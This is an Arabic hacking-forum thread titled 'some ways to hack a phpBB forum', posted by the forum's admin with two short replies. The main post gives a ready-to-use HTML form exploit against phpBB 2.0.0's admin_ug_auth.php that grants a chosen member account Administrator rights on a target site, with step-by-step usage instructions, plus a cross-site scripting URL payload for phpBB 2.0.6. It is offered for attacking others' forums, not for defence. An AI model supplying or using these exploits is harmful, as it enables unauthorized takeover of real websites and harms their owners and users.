كروب ابطال بغداد ( شّبح + جنرٍآل )
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


لآ تآسَفن على غدرٍ آلزمآن لطآلمآ رٍقصت على جثث آلآسَوٍد كـَلآب وٍلآ تحسَبن برٍقصهآ تعلوٍآ على آسَيِّآدهآ فآلآسَوٍد آسَوٍد وٍآلكـَلآب كـَلآب تبقى آلآسَوٍد مخيِّفه فيِّ آسَرٍهآ حتى وٍآن نبحت عليِّهآ آلكـَلآب
 
الرئيسيةأحدث الصورالتسجيلدخول

كروب ابطال بغداد ( شّبح + جنرٍآل ) :: منتدى الثغرات
 

 بعض طرق اختراق منتدى phpbb

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
kingy




عدد المساهمات : 1
نقاط : 1
تاريخ التسجيل : 10/10/2011

بعض طرق اختراق منتدى phpbb Empty
مُساهمةموضوع: رد: بعض طرق اختراق منتدى phpbb   بعض طرق اختراق منتدى phpbb I_icon_minitimeالإثنين أكتوبر 10, 2011 9:06 pm
واين هو رقم العضو
الرجوع الى أعلى الصفحة اذهب الى الأسفل
hemo




عدد المساهمات : 2
نقاط : 2
تاريخ التسجيل : 22/09/2011

بعض طرق اختراق منتدى phpbb Empty
مُساهمةموضوع: رد: بعض طرق اختراق منتدى phpbb   بعض طرق اختراق منتدى phpbb I_icon_minitimeالخميس سبتمبر 22, 2011 1:47 am
الله يعطيك العافيه أخي

بس والله جربتها ماظبطت

يعني بعد ما حطيت صفه administrator ورقم العضويه

ما فتحت الصفحه يلي بعد هيك

ياريت تفيدنا في هل مشكله

ويعطلك الف عافيه

وياريت تقبلني عضوا في منتداك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
ميدو السامرائي
مدير
مدير



عدد المساهمات : 8
نقاط : 26
تاريخ التسجيل : 28/08/2010
العمر : 34

بعض طرق اختراق منتدى phpbb Empty
مُساهمةموضوع: بعض طرق اختراق منتدى phpbb   بعض طرق اختراق منتدى phpbb I_icon_minitimeالسبت أغسطس 28, 2010 8:22 pm
!بســــــــــــم الله الرحمـــــــــــــــــــــــــــــــــن الرحيـــــــــــــــــــــــــــــــــــم !
بعـــض طرق اختـــراق منتدى phpbb
ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
كود PHP:
<html>
<head>
head>
******>

<form method="post"
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administratoroption>
<option value="user">Useroption>select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

form>
body>
html>



عدل هذا العنوان الى عنوان الموقع المستهدف [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



::::::::
ثغره فى الاصدار Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
كود PHP:
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>document.write(document
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
بعض طرق اختراق منتدى phpbb
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» دورة اختراق الشبكات
» -=سهوله اختراق المواقع المجانيه=-
»  برامج اختراق الأحهزه و الشبكات اللاسلكية
» اختراق الايميل بدون ارسال اي شي للضحيه
» تعال اتعلم اختراق المنتديات بالفديو

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
كروب ابطال بغداد ( شّبح + جنرٍآل ) :: منتدى الثغرات-
انتقل الى: